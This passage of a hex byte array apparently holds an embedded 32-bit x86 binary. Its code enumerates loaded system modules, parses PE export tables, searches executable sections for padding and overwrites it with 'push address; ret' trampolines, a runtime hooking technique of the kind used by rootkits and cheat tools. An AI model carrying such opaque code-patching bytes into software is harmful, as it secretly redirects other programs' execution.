0x25,0xd0,0x02,0x00,0x10,\r\n0xff,0x25,0x24,0x03,0x00,0x10,0xff,0x25,0xd8,0x02,0x00,0x10,0xff,0x25,0xdc,0x02,\r\n0x00,0x10,0xff,0x25,0xe0,0x02,0x00,0x10,0xff,0x25,0xe4,0x02,0x00,0x10,0xff,0x25,\r\n0xe8,0x02,0x00,0x10,0xff,0x25,0xec,0x02,0x00,0x10,0xff,0x25,0xf0,0x02,0x0
0,0x10,\r\n0xff,0x25,0xf4,0x02,0x00,0x10,0xff,0x25,0xf8,0x02,0x00,0x10,0xff,0x25,0xfc,0x02,\r\n0x00,0x10,0xff,0x25,0x00,0x03,0x00,0x10,0xff,0x25,0x04,0x03,0x00,0x10,0xff,0x25,\r\n0x08,0x03,0x00,0x10,0xff,0x25,0x0c,0x03,0x00,0x10,0xff,0x25,0x10,0x03,0x00,0x10,\r\n0xff,0x25,0x14,0x03,0x00,0x10,0xff,0x25,0x18,0x03,0x00,0x10,0xff,0x25,0x84,0x02,\r\n0x00,0x10,0xff,0x25,0x80,0x02,0x00,0x10,0xff,0x25,0x88,0x02,0x00,0x10,0xcc,0xcc,\r\n0xff,0xff,0xff,0xff,0xdc,0x16,0x00,0x10,0xe2,0x16,0x00,0x10,0x00,0x00,0x00,0x00,\r\n0xff,0xff,0xff,0xff,0x65,0x1a,0x00,0x10,0x6b,0x1a,0x00,0x10,0x00,0x00,0x00,0x00,\r\n0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x97,0x20,0x00,0x10,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,\r\n0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,\r\n0xff,0xff,0xff,0xff,0xec,0x0a,0x00,0x10,0x00,0x0b,0x00,0x10,0x18,0x0b,0x00,0x10,\r\n0x34,0x0b,0x00,0x10,0x50,0x0b,0x00,0x10,0x64,0x0b,0x00,0x10,0x78,0x0b,0x00,0x10,\r\n0x40,0xbb,0x00,0x00,0xbf,0x44,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x
00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,\r\n0x74,0x38,0x8b,0x4d,0xfc,0x03,0x0d,0x84,0x2d,0x00,0x10,0x89,0x4d,0xf8,0x6a,0x01,\r\n0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,\r\n0xc8,0x85,0xc9,0x74,0x05,0x8b,0x45,0xfc,0xeb,0x12,0x8b,0x55,0xfc,0x03,0x15,0x8c,\r\n0x2d,0x00,0x10,0x8b,0x02,0x89,0x45,0xfc,0xeb,0xc2,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,\r\n0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0x7d,0x0c,0x00,0x74,0x0f,0x8b,0x45,0x0c,0x03,0x05,0x90,0x2d,\r\n0x00,0x10,0x8b,0x00,0xeb,0x11,0xeb,0x0d,0x8b,0x4d,0x08,0x03,0x0d,0x88,0x2d,0x00,\r\n0x10,0x8b,0x01,0xeb,0x02,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x8b,0x45,0x08,0x03,0x05,0x94,0x2d,0x00,0x10,0x8b,0x00,0x5d,0xc2,\r\n0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x38,0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,0x6a,0x0b,0xe8,\r\n0xbc,0xfb,0xff,0xff,0x89,0x45,0xf0,0x83,0x7d,0xf0,0x00,0x74,0x79,0xc7,0x45,0xe4,\r\n0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xe4,0x83,0xc0,0x01,0x89,0x45,0xe4,0x8b,\r\n0x4d,0xf0,0x8b,0x55,0xe4,0x3b,0x11,0x73,0x51,0x8b,0x45,0xe4,0x69,0xc0,0x1c,0x01,\r\n0x00,0x00,0x8b,0x4d,0xf0,0x8b,0x55,0x08,0x3b,0x54,0x01,0x0c,0x76,0x3a,0x8b,0x45,\r\n0xe4,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0
x4d,0xe4,0x69,0xc9,0x1c,0x01,0x00,0x00,\r\n0x8b,0x55,0xf0,0x8b,0x44,0x02,0x0c,0x8b,0x55,0xf0,0x03,0x44,0x0a,0x10,0x39,0x45,\r\n0x08,0x73,0x15,0x8b,0x45,0xe4,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xf0,0x8b,\r\n0x54,0x01,0x0c,0x89,0x55,0xe8,0xeb,0x02,0xeb,0x9c,0x6a,0x00,0x8b,0x45,0xf0,0x50,\r\n0xff,0x15,0x90,0x02,0x00,0x10,0x83,0x7d,0xe8,0x00,0x75,0x08,0x8b,0x45,0x0c,0xe9,\r\n0x5c,0x01,0x00,0x00,0x8b,0x4d,0xe8,0x8b,0x55,0xe8,0x03,0x51,0x3c,0x89,0x55,0xfc,\r\n0x8b,0x45,0xfc,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xfc,0x8d,0x44,0x0a,0x18,0x89,0x45,\r\n0xec,0x6a,0x06,0x6a,0x00,0x8d,0x4d,0xf4,0x51,0xe8,0xf0,0xfb,0xff,0xff,0x83,0xc4,\r\n0x0c,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0xeb,0x12,0x8b,0x55,0xe0,0x83,0xc2,0x01,\r\n0x89,0x55,0xe0,0x8b,0x45,0xec,0x83,0xc0,0x28,0x89,0x45,0xec,0x8b,0x4d,0xfc,0x0f,\r\n0xb7,0x51,0x06,0x39,0x55,0xe0,0x0f,0x83,0x01,0x01,0x00,0x00,0x68,0xc8,0x07,0x00,\r\n0x10,0x8b,0x45,0xec,0x50,0xe8,0x4a,0xfc,0xff,0xff,0x83,0xc4,0x08,0x85,0xc0,0x0f,\r\n0x85,0xe3,0x00,0x00,0x00,0x8b,0x4d,0xec,0x8b,0x51,0x24,0x81,0xe2,0x00,0x00,0x00,\r\n0x20,0x0f,0x84,0xd1,0x00,0x00,0x00,0x8b,0x45,0xec,0x8b,0x48,0x24,0x81,0xe1,0x00,\r\n0x00,0x00,0x02,0x0f,0x85,0xbf,0x00,0x00,0x00,0x8b,0x55,0xfc,0x8b,0x42,0x38,0x83,\r\n0xe8,0x01,0x8b,0x4d,0xec,0x23,0x41,0x08,0x74,0x1c,0x8b,0x55,0xfc,0x8b,0x42,0x38,\r\n0x83,0xe8,0x01,0xf7,0xd0,0x8b,0x4d,0xec,0x23,0x41,0x08,0x8b,0x55,0xfc,0x03,0x42,\r\n0x38,0x89,0x45,0xc8,0xeb,0x09,0x8b,0x45,0xec,0x8b,0x48,0x08,0x89,0x4d,0xc8,0x8b,\r\n0x55,0xc8,0x89,0x55,0xdc,0x8b,0x45,0xec,0x8b,0x4d,0xdc,0x2b,0x48,0x08,0x89,0x4d,\r\n0xd8,0x83,0x7d,0xd8,0x06,0x76,0x71,0x8b,0x55,0xec,0x8b,0x42,0x0c,0x8b,0x4d,0xec,\r\n0x03,0x41,0x08,0x03,0x45,0xe8,0x89,0x45,0xd4,0x8b,0x55,0xd8,0x83,0xea,0x06,0x89,\r\n0x55,0xd0,0xeb,0x09,0x8b,0x45,0xd0,0x83,0xe8,0x01,0x89,0x45,0xd0,0x83,0x7d,0xd0,\r\n0x00,0x74,0x45,0x8b,0x4d,0xd4,0x03,0x4d,0xd0,0x89,0x4d,0xcc,0x6a,0x06,0x8d,0x55,\r\n0xf4,0x52,0x8b,0x45,0xcc,0x50,0xff,0x15,0xe8,0x02,0x00,0x10,0x83,0xf8,0x06,0x75,\r\n0x25,0xe8,0xea,0x1e,0x00,
0x00,0x8b,0x4d,0xcc,0xc6,0x01,0x68,0x8b,0x55,0xcc,0x8b,\r\n0x45,0x0c,0x89,0x42,0x01,0x8b,0x4d,0xcc,0xc6,0x41,0x05,0xc3,0xe8,0xef,0x1e,0x00,\r\n0x00,0x8b,0x45,0xcc,0xeb,0x0a,0xeb,0xac,0xe9,0xdd,0xfe,0xff,0xff,0x8b,0x45,0x0c,\r\n0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x28,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xe8,0xee,0xde,\r\n0xff,0xff,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0x26,0x01,0x00,0x00,0x68,\r\n0xd0,0x07,0x00,0x10,0x8d,0x45,0xec,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x8d,0x4d,\r\n0xec,0x51,0x8b,0x55,0xfc,0x52,0xe8,0x05,0xfd,0xff,0xff,0x89,0x45,0xf4,0x83,0x7d,\r\n0xf4,0x00,0x0f,0x84,0xeb,0x00,0x00,0x00,0x8b,0x45,0xf4,0x50,0x68,0xdc,0x07,0x00,\r\n0x10,0xe8,0x4c,0xfa,0xff,0xff,0x83,0xc4,0x08,0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,\r\n0x8b,0x4d,0xe8,0x51,0x8b,0x55,0xf4,0x52,0xe8,0x33,0xfd,0xff,0xff,0x89,0x45,0xe8,\r\n0x83,0x7d,0xe8,0x00,0x0f,0x84,0xb7,0x00,0x00,0x00,0x8b,0x45,0xe8,0x50,0xe8,0x4d,\r\n0xfd,0xff,0xff,0x89,0x45,0xe4,0x83,0x7d,0xe4,0x00,0x0f,0x84,0x9c,0x00,0x00,0x00,\r\n0x8b,0x4d,0xe4,0x51,0x8b,0x55,0xe8,0x52,0x68,0x10,0x08,0x00,0x10,0xe8,0x00,0xfa,\r\n0xff,0xff,0x83,0xc4,0x0c,0x8b,0x45,0xe4,0x03,0x05,0x98,0x2d,0x00,0x10,0x8b,0x08,\r\n0x89,0x4d,0xe0,0x83,0x7d,0xe0,0x00,0x75,0x02,0xeb,0xa5,0x8b,0x55,0xe0,0x03,0x15,\r\n0xa0,0x2d,0x00,0x10,0x8b,0x02,0x89,0x45,0xd8,0x83,0x7d,0xd8,0x00,0x75,0x02,0xeb,\r\n0x8f,0x8b,0x4d,0x08,0x51,0x68,0xb0,0x21,0x00,0x10,0xe8,0xe1,0xf3,0xff,0xff,0x50,\r\n0x8b,0x55,0xe4,0x52,0x8b,0x45,0xd8,0x50,0xe8,0x83,0xee,0xff,0xff,0x89,0x45,0xdc,\r\n0x83,0x7d,0xdc,0x00,0x74,0x36,0x8b,0x4d,0xdc,0x51,0x8b,0x55,0xd8,0x52,0xe8,0xed,\r\n0xfc,0xff,0xff,0x8b,0x4d,0xe0,0x03,0x0d,0xa0,0x2d,0x00,0x10,0x89,0x01,0x8b,0x55,\r\n0xdc,0x52,0x8b,0x45,0xd8,0x50,0x68,0x48,0x08,0x00,0x10,0xe8,0x82,0xf9,0xff,0xff,\r\n0x83,0xc4,0x0c,0x8b,0x4d,0xf8,0x83,0xc1,0x01,0x89,0x4d,0xf8,0xe9,0x2f,0xff,0xff,\r\n0xff,0xeb,0x0d,0x68,0x80,0x08,0x00,0x10,0xe8,0x65,0xf9,0xff,0xff,0x83,0xc4,0x04,\r\n0xe8,0xbb
,0xde,0xff,0xff,0x8b,0x45,0xf8,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x83,0x7d,0x08,0x00,0x74,0x26,0xc7,0x45,0xfc,0x00,0x00,0x00,\r\n0x00,0xeb,0x09,0x8b,0x45,0xfc,0x83,0xc0,0x01,0x89,0x45,0xfc,0x8b,0x4d,0x08,0x03,\r\n0x4d,0xfc,0x0f,0xbe,0x11,0x85,0xd2,0x74,0x02,0xeb,0xe8,0x8b,0x45,0xfc,0xeb,0x02,\r\n0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0x8b,0x45,0x08,0x50,0xe8,0xb1,0xff,0xff,0xff,0x89,\r\n0x45,0xf8,0x8b,0x4d,0x0c,0x51,0xe8,0xa5,0xff,0xff,0xff,0x89,0x45,0xfc,0x8b,0x55,\r\n0xf8,0x3b,0x55,0xfc,0x74,0x07,0xb8,0x01,0x00,0x00,0x00,0xeb,0x3b,0xc7,0x45,0xf4,\r\n0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xf4,0x83,0xc0,0x01,0x89,0x45,0xf4,0x8b,\r\n0x4d,0xf4,0x3b,0x4d,0xf8,0x73,0x1f,0x8b,0x55,0x08,0x03,0x55,0xf4,0x0f,0xbe,0x02,\r\n0x8b,0x4d,0x0c,0x03,0x4d,0xf4,0x0f,0xbe,0x11,0x3b,0xc2,0x74,0x07,0xb8,0x01,0x00,\r\n0x00,0x00,0xeb,0x04,0xeb,0xd0,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x0c,0x50,0xe8,0x41,0xff,0xff,0xff,0x83,\r\n0xc0,0x01,0x89,0x45,0xfc,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,\r\n0xf8,0x83,0xc1,0x01,0x89,0x4d,0xf8,0x8b,0x55,0xf8,0x3b,0x55,0xfc,0x73,0x12,0x8b,\r\n0x45,0x08,0x03,0x45,0xf8,0x8b,0x4d,0x0c,0x03,0x4d,0xf8,0x8a,0x11,0x88,0x10,0xeb,\r\n0xdd,0x8b,0x45,0x08,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x8b,0x45,0x08,0x89,0x45,0xfc,0xeb,0x09,0x8b,0x4d,0x08,0x83,\r\n0xc1,0x01,0x89,0x4d,0x08,0x8b,0x55,0xfc,0x52,0xe8,0xe2,0xfe,0xff,0xff,0x03,0x45,\r\n0xfc,0x39,0x45,0x08,0x77,0x26,0x8b,0x45,0x08,0x0f,0xbe,0x08,0x83,0xf9,0x41,0x7c,\r\n0x19,0x8b,0x55,0x08,0x0f,0xbe,0x02,0x83,0xf8,0x5a,0x7f,0x0e,0x8b,0x4d,0x08,0x0f,\r\n0xbe,0x11,0x83,0xc2,0x20,0x8b,0x45,0x08,0x88,0x10,0xeb,0xc0,0x8b,0x45,0xfc,0x8b,\r\n0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x0f,0xb7,0x45,0x08,0x83,0xf8,0x41,0x7c,0x12,0x0f,0xb7,0x4d,0x
08,\r\n0x83,0xf9,0x5a,0x7f,0x09,0x0f,0xb7,0x45,0x08,0x83,0xc0,0x20,0xeb,0x04,0x66,0x8b,\r\n0x45,0x08,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x14,0x8b,0x45,0x08,0x0f,0xb7,0x08,0x8b,0x55,0x0c,0x0f,\r\n0xb7,0x02,0x3b,0xc8,0x7d,0x0c,0x8b,0x4d,0x08,0x66,0x8b,0x11,0x66,0x89,0x55,0xee,\r\n0xeb,0x0a,0x8b,0x45,0x0c,0x66,0x8b,0x08,0x66,0x89,0x4d,0xee,0x0f,0xb7,0x55,0xee,\r\n0xd1,0xea,0x66,0x89,0x55,0xfc,0xb8,0x01,0x00,0x00,0x00,0x66,0x89,0x45,0xf8,0xeb,\r\n0x0c,0x66,0x8b,0x4d,0xf8,0x66,0x83,0xc1,0x01,0x66,0x89,0x4d,0xf8,0x0f,0xb7,0x55,\r\n0xf8,0x0f,0xb7,0x45,0xfc,0x3b,0xd0,0x7d,0x71,0x8b,0x4d,0x08,0x0f,0xb7,0x11,0xd1,\r\n0xea,0x0f,0xb7,0x45,0xf8,0x2b,0xd0,0x8b,0x4d,0x08,0x8b,0x41,0x04,0x66,0x8b,0x0c,\r\n0x50,0x66,0x89,0x4d,0xf4,0x8b,0x55,0x0c,0x0f,0xb7,0x02,0xd1,0xe8,0x0f,0xb7,0x4d,\r\n0xf8,0x2b,0xc1,0x8b,0x55,0x0c,0x8b,0x4a,0x04,0x66,0x8b,0x14,0x41,0x66,0x89,0x55,\r\n0xf0,0x0f,0xb6,0x45,0x10,0x85,0xc0,0x74,0x1c,0x0f,0xb7,0x4d,0xf4,0x51,0xe8,0x2d,\r\n0xff,0xff,0xff,0x66,0x89,0x45,0xf4,0x0f,0xb7,0x55,0xf0,0x52,0xe8,0x1f,0xff,0xff,\r\n0xff,0x66,0x89,0x45,0xf0,0x0f,0xb7,0x45,0xf4,0x0f,0xb7,0x4d,0xf0,0x3b,0xc1,0x74,\r\n0x04,0x32,0xc0,0xeb,0x07,0xe9,0x77,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,\r\n0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x1c,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x45,0x08,\r\n0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,0x4d,0xf8,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x04,\r\n0x3d,0x4c,0x01,0x00,0x00,0x75,0x17,0x8b,0x4d,0xf8,0x83,0x79,0x78,0x00,0x74,0x0c,\r\n0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x42,0x78,0x89,0x45,0xfc,0xeb,0x3c,0x8b,0x4d,\r\n0xf8,0x0f,0xb7,0x51,0x04,0x81,0xfa,0x64,0x86,0x00,0x00,0x75,0x29,0x8b,0x45,0x08,\r\n0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,0x4d,0xf4,0x8b,0x55,0xf4,0x83,0xba,0x88,0x00,\r\n0x00,0x00,0x00,0x74,0x0f,0x8b,0x45,0xf4,0x8b,0x4d,0x08,0x03,0x88,0x88,0x00,0x00,\r\n0x00,0x89,0x4d,0xfc,0xeb,0x04,0x33,0xc0,0xeb,0x7c,0x83,0x7d,0
xfc,0x00,0x74,0x74,\r\n0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x1c,0x89,0x45,0xf0,0x8b,0x4d,0xfc,0x8b,\r\n0x55,0x08,0x03,0x51,0x24,0x89,0x55,0xec,0x8b,0x45,0xfc,0x8b,0x4d,0x08,0x03,0x48,\r\n0x20,0x89,0x4d,0xe8,0xc7,0x45,0xe4,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xe4,\r\n0x83,0xc2,0x01,0x89,0x55,0xe4,0x8b,0x45,0xfc,0x8b,0x4d,0xe4,0x3b,0x48,0x14,0x73,\r\n0x33,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xe4,0x8b,0x4d,0xe8,0x8b,0x55,0x08,0x03,0x14,\r\n0x81,0x52,0xe8,0xf9,0xfc,0xff,0xff,0x85,0xc0,0x75,0x17,0x8b,0x45,0xe4,0x8b,0x4d,\r\n0xec,0x0f,0xbf,0x14,0x41,0x8b,0x45,0xf0,0x8b,0x4d,0x08,0x03,0x0c,0x90,0x8b,0xc1,\r\n0xeb,0x04,0xeb,0xb9,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x84,0x00,0x00,0x00,0xc7,0x45,0xc0,0x00,0x00,0x00,0x00,\r\n0x68,0x88,0x0c,0x00,0x10,0x8d,0x45,0xc4,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x68,\r\n0x98,0x0c,0x00,0x10,0x8d,0x4d,0xe0,0x51,0xff,0x15,0x20,0x03,0x00,0x10,0xc7,0x45,\r\n0xe8,0xb4,0x0c,0x00,0x10,0xc7,0x45,0xec,0xc4,0x0c,0x00,0x10,0xc7,0x45,0xf0,0xdc,\r\n0x0c,0x00,0x10,0xc7,0x45,0xf4,0xf4,0x0c,0x00,0x10,0xc7,0x45,0xf8,0x0c,0x0d,0x00,\r\n0x10,0xc7,0x45,0xfc,0x28,0x0d,0x00,0x10,0xc7,0x45,0xd0,0x44,0x0d,0x00,0x10,0xc7,\r\n0x45,0xd4,0x60,0x0d,0x00,0x10,0xc7,0x45,0xd8,0x7c,0x0d,0x00,0x10,0xc7,0x45,0xdc,\r\n0x98,0x0d,0x00,0x10,0x6a,0x0b,0xe8,0x85,0xf4,0xff,0xff,0x89,0x45,0xcc,0x83,0x7d,\r\n0xcc,0x00,0x0f,0x84,0xda,0x01,0x00,0x00,0x8b,0x55,0x08,0x52,0x8d,0x45,0xac,0x50,\r\n0xff,0x15,0x18,0x03,0x00,0x10,0x6a,0x01,0x8d,0x4d,0xac,0x51,0x8d,0x55,0xb4,0x52,\r\n0xff,0x15,0x14,0x03,0x00,0x10,0x89,0x45,0xbc,0x83,0x7d,0xbc,0x00,0x0f,0x8c,0xa3,\r\n0x01,0x00,0x00,0xc7,0x45,0xa8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xa8,0x83,\r\n0xc0,0x01,0x89,0x45,0xa8,0x8b,0x4d,0xcc,0x8b,0x55,0xa8,0x3b,0x11,0x0f,0x83,0x79,\r\n0x01,0x00,0x00,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xcc,0x8d,\r\n0x54,0x01,0x04,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xcc,0x0f,\r\n0xb7,0x44,0x01,0x1e,0x8d,0x4c,0x02,0x1c,0x51,
0x8d,0x55,0x9c,0x52,0xff,0x15,0x18,\r\n0x03,0x00,0x10,0x6a,0x01,0x8d,0x45,0x9c,0x50,0x8d,0x4d,0x94,0x51,0xff,0x15,0x14,\r\n0x03,0x00,0x10,0x89,0x45,0xa4,0x83,0x7d,0xa4,0x00,0x0f,0x8c,0x27,0x01,0x00,0x00,\r\n0x6a,0x01,0x8d,0x55,0xc4,0x52,0x8d,0x45,0xb4,0x50,0xff,0x15,0xa0,0x02,0x00,0x10,\r\n0x0f,0xb6,0xc8,0x85,0xc9,0x74,0x5d,0xc7,0x45,0x90,0x00,0x00,0x00,0x00,0xeb,0x09,\r\n0x8b,0x55,0x90,0x83,0xc2,0x01,0x89,0x55,0x90,0x83,0x7d,0x90,0x06,0x7d,0x40,0x8b,\r\n0x45,0x90,0x8b,0x4c,0x85,0xe8,0x51,0x8d,0x55,0x88,0x52,0xff,0x15,0x20,0x03,0x00,\r\n0x10,0x6a,0x01,0x8d,0x45,0x88,0x50,0x8d,0x4d,0x94,0x51,0xff,0x15,0xa0,0x02,0x00,\r\n0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x15,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,\r\n0x00,0x8b,0x4d,0xcc,0x8b,0x54,0x01,0x0c,0x89,0x55,0xc0,0xeb,0x02,0xeb,0xb1,0xe9,\r\n0xa1,0x00,0x00,0x00,0x6a,0x01,0x8d,0x45,0xe0,0x50,0x8d,0x4d,0xb4,0x51,0xff,0x15,\r\n0xa0,0x02,0x00,0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x60,0xc7,0x45,0x84,0x00,0x00,\r\n0x00,0x00,0xeb,0x09,0x8b,0x45,0x84,0x83,0xc0,0x01,0x89,0x45,0x84,0x83,0x7d,0x84,\r\n0x04,0x7d,0x46,0x8b,0x4d,0x84,0x8b,0x54,0x8d,0xd0,0x52,0x8d,0x85,0x7c,0xff,0xff,\r\n0xff,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x6a,0x01,0x8d,0x8d,0x7c,0xff,0xff,0xff,\r\n0x51,0x8d,0x55,0x94,0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0,\r\n0x74,0x15,0x8b,0x4d,0xa8,0x69,0xc9,0x1c,0x01,0x00,0x00,0x8b,0x55,0xcc,0x8b,0x44,\r\n0x0a,0x0c,0x89,0x45,0xc0,0xeb,0x02,0xeb,0xab,0xeb,0x2a,0x6a,0x01,0x8d,0x4d,0x94,\r\n0x51,0x8d,0x55,0xb4,0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0,\r\n0x74,0x13,0x8b,0x4d,0xa8,0x69,0xc9,0x1c,0x01,0x00,0x00,0x8b,0x55,0xcc,0x8b,0x44,\r\n0x0a,0x0c,0x89,0x45,0xc0,0x8d,0x4d,0x94,0x51,0xff,0x15,0x10,0x03,0x00,0x10,0x83,\r\n0x7d,0xc0,0x00,0x74,0x02,0xeb,0x05,0xe9,0x70,0xfe,0xff,0xff,0x8d,0x55,0xb4,0x52,\r\n0xff,0x15,0x10,0x03,0x00,0x10,0x6a,0x00,0x8b,0x45,0xcc,0x50,0xff,0x15,0x90,0x02,\r\n0x00,0x10,0x8b,0x45,0xc0,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08
,0x83,0x7d,0x08,0x00,0x0f,0x85,0xc9,0x00,0x00,0x00,\r\n0x8b,0x45,0x0c,0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x8b,0x51,0x0c,0x52,0x8b,0x45,0xf8,\r\n0x8b,0x48,0x0c,0x51,0xe8,0x87,0xf0,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x07,\r\n0x32,0xc0,0xe9,0xa4,0x00,0x00,0x00,0x8b,0x45,0xf8,0x8b,0x08,0x89,0x0d,0x18,0x2e,\r\n0x00,0x10,0x8b,0x55,0xf8,0x8b,0x42,0x0c,0xa3,0x1c,0x2e,0x00,0x10,0x8b,0x4d,0xf8,\r\n0x8b,0x11,0x52,0x68,0xb4,0x0d,0x00,0x10,0x8b,0x45,0xf8,0x8b,0x48,0x0c,0x51,0xe8,\r\n0xdc,0xee,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x04,0x32,0xc0,0xeb,0x6c,0xa1,\r\n0x18,0x2e,0x00,0x10,0x50,0x68,0xc4,0x0d,0x00,0x10,0xe8,0xf3,0xf2,0xff,0xff,0x83,\r\n0xc4,0x08,0x68,0xf0,0x0d,